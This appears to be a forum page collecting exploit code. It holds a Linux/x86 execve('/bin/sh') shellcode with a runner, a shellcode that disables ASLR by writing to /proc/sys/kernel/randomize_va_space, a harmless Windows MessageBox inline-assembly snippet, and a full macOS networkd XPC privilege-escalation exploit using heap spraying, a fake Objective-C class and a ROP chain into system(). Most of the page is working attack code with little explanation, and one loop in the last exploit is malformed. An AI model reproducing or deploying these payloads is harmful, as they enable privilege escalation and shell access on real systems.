Search the Community

/* ; Title: Linux/x86 execve "/bin/sh" - shellcode 26 bytes ; Platform: linux/x86_64 ; Date: 2015-05-19 ; Author: Reza Behzadpour ; Simple ShellCode section .text global _start _start: xor ecx,ecx mul ecx ;execve("/bin/sh", NULL, NULL) mov al,11 jmp shell shell_ret: pop ebx push ecx push ebx pop ebx int 0x80 shell: call shell_ret db "/bin/sh" */ /* # tcc -o ./shellcode ./shellcode.c # uname -r 3.12-kali1-686-pae */ #include <stdio.h> #include <string.h> char shellcode[] = { "\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b" "\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68" }; int main() { printf("Shellcode Length: %d\n", (int)strlen(shellcode)); int *ret; ret = (int *) &ret + 2; (*ret) = (int) shellcode; return 0; } Source

/* #Title: Disable ASLR in Linux (less byte and more compact) #Length: 84 bytes #Date: 3 April 2015 #Author: Mohammad Reza Ramezani (mr.ramezani.edu@gmail.com - g+) #Tested On: kali-linux-1.0.6-i386 Thanks to stackoverflow section .text global _start _start: jmp short fileaddress shellcode: pop ebx xor eax,eax mov byte [ebx + 35],al push byte 5 pop eax push byte 2 pop ecx int 80h mov ebx, eax push byte 4 pop eax jmp short output cont: pop ecx push byte 2 pop edx int 80h push byte 1 pop eax xor ebx, ebx int 80h fileaddress: call shellcode db '/proc/sys/kernel/randomize_va_spaceX' output: call cont db '0',10 */ char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58" "\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a \xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70 \x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72 \x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63 \x65\x58\xe8\xc5\xff\xff\xff\x30\x0a"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Source

A fost un mic pariu cu @Usr6.M-am gandit sa il postez aici pentru cine vrea sa foloseasca functii din windows.h in asm. #include "windows.h" char a2[]="usr6"; char a3[]="Salut"; int main() { __asm { mov eax,0 push eax mov eax,offset a3 push eax mov eax,offset a2 push eax mov eax,0 push eax call DWORD PTR MessageBox pop ebx pop ebx pop ebx pop ebx } }

// Requires Lorgnette: https://github.com/rodionovd/liblorgnette // clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation // ianbeer #include <dlfcn.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> #include <xpc/xpc.h> #include <CoreFoundation/CoreFoundation.h> #include <mach/mach.h> #include <mach/mach_vm.h> #include <mach/task.h> #include <mach-o/dyld_images.h> #include "liblorgnette/lorgnette.h" /* find the base address of CoreFoundation for the ROP gadgets */ void* find_library_load_address(const char* library_name){ kern_return_t err; // get the list of all loaded modules from dyld // the task_info mach API will get the address of the dyld all_image_info struct for the given task // from which we can get the names and load addresses of all modules task_dyld_info_data_t task_dyld_info; mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT; err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count); const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr; const struct dyld_image_info* image_infos = all_image_infos->infoArray; for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){ const char* image_name = image_infos[i].imageFilePath; mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress; if (strstr(image_name, library_name)){ return (void*)image_load_address; } } return NULL; } struct heap_spray { void* fake_objc_class_ptr; // -------+ uint8_t pad0[0x10]; // | uint64_t first_gadget; // | uint8_t pad1[0x8]; // | uint64_t null0; // | uint64_t pad3; // | uint64_t pop_rdi_rbp_ret; // | uint64_t rdi; // | uint64_t rbp; // | uint64_t system; // | struct fake_objc_class_t { // | char pad[0x10]; // <----------+ void* cache_buckets_ptr; //--------+ uint64_t cache_bucket_mask; // | } fake_objc_class; // | struct fake_cache_bucket_t { // | void* cached_sel; // <--------+ //point to the right selector void* cached_function; // will be RIP } fake_cache_bucket; char command[256]; }; xpc_connection_t connect(){ xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(conn, ^(xpc_object_t event) { xpc_type_t t = xpc_get_type(event); if (t == XPC_TYPE_ERROR){ printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); } printf("received an event\n"); }); xpc_connection_resume(conn); return conn; } void go(){ void* heap_spray_target_addr = (void*)0x120202000; struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0); memset(hs, 'C', 0x1000); hs->null0 = 0; hs->fake_objc_class_ptr = &hs->fake_objc_class; hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket; hs->fake_objc_class.cache_bucket_mask = 0; // nasty hack to find the correct selector address uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release"); uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector uint64_t sel = msgrefs[1]; printf("%p\n", sel); hs->fake_cache_bucket.cached_sel = sel; uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation"); // pivot: /* push rax add eax, [rax] add [rbx+0x41], bl pop rsp pop r14 pop r15 pop rbp ret */ hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here // jump over the NULL then so there's more space: //pop, pop, pop, ret: //and keep stack correctly aligned hs->first_gadget = CoreFoundation_base + 0x46ef7; hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226; hs->system = dlsym(RTLD_DEFAULT, "system"); hs->rdi = &hs->command; strcpy(hs->command, "touch /tmp/hello_networkd"); size_t heap_spray_pages = 0x40000; size_t heap_spray_bytes = heap_spray_pages * 0x1000; char* heap_spray_copies = malloc(heap_spray_bytes); for (int i = 0; i < heap_spray_pages; i++){ memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000); } xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes); xpc_dictionary_set_uint64(msg, "type", 6); xpc_dictionary_set_uint64(msg, "connection_id", 1); xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0); xpc_object_t conn_list = xpc_array_create(NULL, 0); xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_string(arr_dict, "hostname", "example.com"); xpc_array_append_value(conn_list, arr_dict); xpc_dictionary_set_value(params, "connection_entry_list", conn_list); char* long_key = malloc(1024); memset(long_key, 'A', 1023); long_key[1023] = '\x00'; xpc_dictionary_set_string(params, long_key, "something or other that's not important"); uint64_t uuid[] = {0, 0x120200000}; xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid); xpc_dictionary_set_uint64(params, "start", 0); xpc_dictionary_set_uint64(params, "duration", 0); xpc_dictionary_set_value(msg, "parameters", params); xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_int64(state, "power_slot", 0); xpc_dictionary_set_value(msg, "state", state); xpc_object_t conn = connect(); printf("connected\n"); xpc_connection_send_message(conn, msg); printf("enqueued message\n"); xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");}); xpc_release(msg); } int main(){ go(); printf("entering CFRunLoop\n"); for({ CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE); } return 0; } Source